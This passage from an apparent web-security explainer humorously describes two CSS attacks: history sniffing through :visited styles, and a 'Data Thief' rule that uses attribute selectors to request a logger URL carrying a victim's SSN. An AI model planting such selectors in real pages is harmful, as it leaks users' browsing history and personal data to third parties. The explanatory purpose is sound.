You put a link to a particular page on your site, say Tickle Pigs
You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
You test the computed style of that link.
If it’s pink, this user is a pig tickler.
You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.
You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.
The Data Thief
This one goes like this:
If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
I can use attribute selectors to figure it out.
input#ssn[value=”123-45-6789″] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
A billion selectors and you’ve covered all the possibilities!